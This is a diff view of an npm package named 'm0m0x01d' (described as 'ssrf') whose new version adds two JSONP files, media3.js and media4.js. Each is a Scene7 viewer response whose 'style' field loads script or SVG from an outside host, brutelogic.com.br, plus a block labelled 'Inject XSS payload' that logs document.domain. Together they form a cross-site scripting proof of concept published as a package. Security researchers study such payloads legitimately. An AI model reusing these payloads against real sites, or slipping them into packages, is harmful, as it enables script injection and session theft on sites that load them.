m0m0x01d 28.0.0 → 29.0.0

Sign up to get free protection for your applications and to get access to all the features.
Files changed (3) hide show
  1. package/media3.js +13 -0
  2. package/media4.js +13 -0
  3. package/package.json +1 -1
package/media3.js ADDED
@@ -0,0 +1,13 @@
1
+ GNU nano 6.2 media2.js
2
+ /*jsonp*/
3
+ s7sdkJSONResponse({
4
+ "style": "https://brutelogic.com.br/1.js",
5
+ "type": "MixedMediaHTML5Mobile",
6
+ "vt": "MediaSetVirtual"
7
+ }, "192959476");
8
+
9
+ // Inject XSS payload after the JSONP function
10
+ (function() {
11
+ var xss_payload = document.domain;
12
+ console.log("XSS payload: " + xss_payload); // This will log the domain name to the console
13
+ })();
package/media4.js ADDED
@@ -0,0 +1,13 @@
1
+ GNU nano 6.2 media2.js
2
+ /*jsonp*/
3
+ s7sdkJSONResponse({
4
+ "style": "https://brutelogic.com.br/poc.svg",
5
+ "type": "MixedMediaHTML5Mobile",
6
+ "vt": "MediaSetVirtual"
7
+ }, "192959476");
8
+
9
+ // Inject XSS payload after the JSONP function
10
+ (function() {
11
+ var xss_payload = document.domain;
12
+ console.log("XSS payload: " + xss_payload); // This will log the domain name to the console
13
+ })();
package/package.json CHANGED
@@ -1,6 +1,6 @@
1
1
  {
2
2
  "name": "m0m0x01d",
3
- "version": "28.0.0",
3
+ "version": "29.0.0",
4
4
  "description": "ssrf",
5
5
  "main": "index.html",
6
6
  "scripts": {